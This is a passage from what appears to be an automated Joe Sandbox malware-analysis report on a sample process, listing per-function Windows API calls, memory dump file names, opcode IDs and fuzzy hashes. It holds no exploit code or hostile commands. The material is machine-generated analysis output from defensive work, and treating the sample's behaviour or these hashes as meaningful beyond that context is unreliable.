                                                                                                                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E87E9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 357397906-0
                                                                                                                                                                            • Opcode ID: e8880f547b8a38460b029065cae307f8068bc51c5799aee31d94ec34fafde271
                                                                                                                                                                            • Instruction ID: c720a01c951270f58cec03084c91932483eeae29d08c8f691541876bb44cb272
                                                                                                                                                                            • Opcode Fuzzy Hash: e8880f547b8a38460b029065cae307f8068bc51c5799aee31d94ec34fafde271
                                                                                                                                                                            • Instruction Fuzzy Hash: EB1142B9D00249EFDB41CFA9C884AEEBBF5FB18310F108166E915E7220D735AA54CF90
                                                                                                                                                                            Function 00852150 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSysColor.USER32(00000008), ref: 0085216C
                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00852176
                                                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00852189
                                                                                                                                                                            • GetStockObject.GDI32(00000005), ref: 00852191
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Color$ModeObjectStockText
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4037423528-0
                                                                                                                                                                            • Opcode ID: 8e0ba7a77f14f8025fc9b8f28fb7f23e63dea8766dfb543f9bff8c4496a39a9e
                                                                                                                                                                            • Instruction ID: 78eb614ef03f7976db1150dabe5ebe178c8dce66483a5d70b6d32b2adbb422e8
                                                                                                                                                                            • Opcode Fuzzy Hash: 8e0ba7a77f14f8025fc9b8f28fb7f23e63dea8766dfb543f9bff8c4496a39a9e
                                                                                                                                                                            • Instruction Fuzzy Hash: D2E06532240780AEDB215B74AC497D97B21FB12336F048219F6BA8C0E0C77246449B10
                                                                                                                                                                            Function 008AEBD6 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 008AEBD6
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 008AEBE0
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008AEC00
                                                                                                                                                                            • ReleaseDC.USER32(?), ref: 008AEC21
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                            • Opcode ID: d0070474dba005ca35cfec7dbe387aa60bfa269d5f4e945c9b4b8ae110f46879
                                                                                                                                                                            • Instruction ID: 0e76b876efa7ad73a3ec93d977d881b5a352a1a1e7f02491c0a708cfc41c5b86
                                                                                                                                                                            • Opcode Fuzzy Hash: d0070474dba005ca35cfec7dbe387aa60bfa269d5f4e945c9b4b8ae110f46879
                                                                                                                                                                            • Instruction Fuzzy Hash: 28E01AB5800305DFCF50AFA08848A6DBBB1FB58311F15844AE84AEB220CB398949DF54
                                                                                                                                                                            Function 008AEBEA Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 008AEBEA
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 008AEBF4
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008AEC00
                                                                                                                                                                            • ReleaseDC.USER32(?), ref: 008AEC21
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                            • Opcode ID: 9ad119bba9d7bbf60672f30ac1cba3fc1c62f56a805e87033fff3ebd33f94852
                                                                                                                                                                            • Instruction ID: 4a7ceeca776bd9d89f1c62112382b655b759c7f49be27c5fe6352529f86b7e05
                                                                                                                                                                            • Opcode Fuzzy Hash: 9ad119bba9d7bbf60672f30ac1cba3fc1c62f56a805e87033fff3ebd33f94852
                                                                                                                                                                            • Instruction Fuzzy Hash: 3AE01AB5800304DFCF509FB0884865DBBB1FB58311F158449E909EB220CB395909DF40
                                                                                                                                                                            Function 0087E60D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 0087E69D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                                                                            • String ID: pow
                                                                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                                                                            • Opcode ID: f715650ddfcb16cd90e2eaf1ffdccfb0713b5e2579511c2b74a5284a9976d5df
                                                                                                                                                                            • Instruction ID: a9c76dcb3b511c794781f42d6ee3fae420d906e3ff88aa7c57d49b96f9842937
                                                                                                                                                                            • Opcode Fuzzy Hash: f715650ddfcb16cd90e2eaf1ffdccfb0713b5e2579511c2b74a5284a9976d5df
                                                                                                                                                                            • Instruction Fuzzy Hash: B6515761A08106D6CB15B728DD4577A3BA4FB24740FB0CA98E099C62BDEF34CC96DB46
                                                                                                                                                                            Function 0086A86C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: #
                                                                                                                                                                            • API String ID: 0-1885708031
                                                                                                                                                                            • Opcode ID: 8bd7c4e1de67dd3fe0859871e5ee5985de9b5882e92278bac1448effffc3abdd
                                                                                                                                                                            • Instruction ID: a596db1bf12585377ce365f87d9d9f523b23e8c6867acf07c21062e749e97c31
                                                                                                                                                                            • Opcode Fuzzy Hash: 8bd7c4e1de67dd3fe0859871e5ee5985de9b5882e92278bac1448effffc3abdd
                                                                                                                                                                            • Instruction Fuzzy Hash: 5551443050524ACFEF19DF28C480ABA7BA1FF1A314F254055ECA1EB290DB349D46CB76
                                                                                                                                                                            Function 008D60A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BuffCharUpper_wcslen
                                                                                                                                                                            • String ID: CALLARGARRAY
                                                                                                                                                                            • API String ID: 157775604-1150593374
                                                                                                                                                                            • Opcode ID: 730035aedddb9d7b163078e73b63ff500bb7ef7cfa9b01df96bf1df08b75ccae
                                                                                                                                                                            • Instruction ID: 90adffe1d98b9adf1cd262081b7e701e85d58f77578f7306e2a185d2048d477c
                                                                                                                                                                            • Opcode Fuzzy Hash: 730035aedddb9d7b163078e73b63ff500bb7ef7cfa9b01df96bf1df08b75ccae
                                                                                                                                                                            • Instruction Fuzzy Hash: A841BE71A002199FCF04DFA8C8818AEBBB5FF58320F14412AE806E7352EB709D95CF90
                                                                                                                                                                            Function 008E406F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00857759
                                                                                                                                                                              • Part of subcall function 0085771B: GetStockObject.GDI32(00000011), ref: 0085776D
                                                                                                                                                                              • Part of subcall function 0085771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00857777
                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 008E40D9
                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 008E40F3
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                            • String ID: static
                                                                                                                                                                            • API String ID: 1983116058-2160076837
                                                                                                                                                                            • Opcode ID: 726f88b0732de35e66baf9d16111660bd801741ca83b91d21a48596b7c024691
                                                                                                                                                                            • Instruction ID: 5c89adbe960ac046d6530069bc11aaa0370bc99d0b48a35d5345d0aa8230762f
                                                                                                                                                                            • Opcode Fuzzy Hash: 726f88b0732de35e66baf9d16111660bd801741ca83b91d21a48596b7c024691
                                                                                                                                                                            • Instruction Fuzzy Hash: 4F112672610249AFDF00DFA9CC46AEA7BB8FB09314F005924F959E7250E675E851DB60
                                                                                                                                                                            Function 008B256E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
                                                                                                                                                                              • Part of subcall function 008B4536: GetClassNameW.USER32(?,?,000000FF), ref: 008B4559
                                                                                                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008B25DC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                            • Opcode ID: f4dc39b90c242d285a3dd131306dfe24ccd8ef84cdee6e197ae131c253ce7f56
                                                                                                                                                                            • Instruction ID: cfcc850e96dd34c5eec76dc6680acad56eb6307bb7dfb81433643f4201d7f37c
                                                                                                                                                                            • Opcode Fuzzy Hash: f4dc39b90c242d285a3dd131306dfe24ccd8ef84cdee6e197ae131c253ce7f56
                                                                                                                                                                            • Instruction Fuzzy Hash: AB01B57164422DABCB24EBA8CC51CFE7774FF66310B040619A862D73D6EA30980C9661
                                                                                                                                                                            Function 008B2468 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
                                                                                                                                                                              • Part of subcall function 008B4536: GetClassNameW.USER32(?,?,000000FF), ref: 008B4559
                                                                                                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 008B24D6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                            • Opcode ID: 7b954bbd4eae86726fad4b91d29f83e7ed2c1cef64abb9b36bdcf28f9d0cb4b2
                                                                                                                                                                            • Instruction ID: b1e7d150b446e37482d68fc7711c3ac5a0f36993ecda0f143f60427f996807c4
                                                                                                                                                                            • Opcode Fuzzy Hash: 7b954bbd4eae86726fad4b91d29f83e7ed2c1cef64abb9b36bdcf28f9d0cb4b2
                                                                                                                                                                            • Instruction Fuzzy Hash: 98018471A44109ABDB28EBA8C852AFF77A8FF55344F1400196912E73C2DA549E0CC676
                                                                                                                                                                            Function 008B24EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
                                                                                                                                                                              • Part of subcall function 008B4536: GetClassNameW.USER32(?,?,000000FF), ref: 008B4559
                                                                                                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 008B2558
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                            • Opcode ID: 5da2041d314eff16c31b5565cb9f4dd64c6f371a9d0e234ee50877bcdcd22f9f
                                                                                                                                                                            • Instruction ID: 6dcfac9979766991a7b7d54aa19e9c80d3ce3c6ec17f35d9dd4249181238d7c4
                                                                                                                                                                            • Opcode Fuzzy Hash: 5da2041d314eff16c31b5565cb9f4dd64c6f371a9d0e234ee50877bcdcd22f9f
                                                                                                                                                                            • Instruction Fuzzy Hash: 4301A271A44109A7CB25EBA8C952AFE77A8FB25740F1400157802E7382EA249E0CC672
                                                                                                                                                                            Function 008B25F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
                                                                                                                                                                              • Part of subcall function 008B4536: GetClassNameW.USER32(?,?,000000FF), ref: 008B4559
                                                                                                                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 008B2663
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                            • Opcode ID: 623564f30464d6cce23ac29cef788f5b396842329a91329548a09b7da901585b
                                                                                                                                                                            • Instruction ID: 9d30cffd274f1bce39ef8ff0a5cb9fe6589091033891ca32d96b5f60e6ffae9c
                                                                                                                                                                            • Opcode Fuzzy Hash: 623564f30464d6cce23ac29cef788f5b396842329a91329548a09b7da901585b
                                                                                                                                                                            • Instruction Fuzzy Hash: 33F08171A8421DA6CB24E7A88C52FFE7778FB21714F040A15B862E73C6DA64580D8261
                                                                                                                                                                            Function 008E2C81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008E2C8B
                                                                                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008E2C9E
                                                                                                                                                                              • Part of subcall function 008BF1A7: Sleep.KERNEL32 ref: 008BF21F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                            • Opcode ID: 768ff38370c5985faf30b0b43f62e226c0a8ee96ccf4ab14660a60d5ce4b7e06
                                                                                                                                                                            • Instruction ID: 14d9b7ac366011c25a2706f61126665b9e5783e77de93e4b70581be5640bf8d1
                                                                                                                                                                            • Opcode Fuzzy Hash: 768ff38370c5985faf30b0b43f62e226c0a8ee96ccf4ab14660a60d5ce4b7e06
                                                                                                                                                                            • Instruction Fuzzy Hash: 5CD012393C4390BBF668B774DC4FFD67B54BB90B14F0008157749AE1D1C9E06844C6A4
                                                                                                                                                                            Function 008E2CB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008E2CCB
                                                                                                                                                                            • PostMessageW.USER32(00000000), ref: 008E2CD2
                                                                                                                                                                              • Part of subcall function 008BF1A7: Sleep.KERNEL32 ref: 008BF21F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                            • Opcode ID: 344746b20b8f1a27e71b72c0409b81cc88ca9a8eb929cc4f1302ebffa9699114
                                                                                                                                                                            • Instruction ID: 7ecbda3befcbf8bd565f712caaa4649820bb248f71386f9f02df37ac989776e8
                                                                                                                                                                            • Opcode Fuzzy Hash: 344746b20b8f1a27e71b72c0409b81cc88ca9a8eb929cc4f1302ebffa9699114
                                                                                                                                                                            • Instruction Fuzzy Hash: 4BD0C9353C53906AF668B774DC4FFC66A54BB94B14F4008157745AE1D1C9A0684486A8
                                                                                                                                                                            Function 0088C19D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
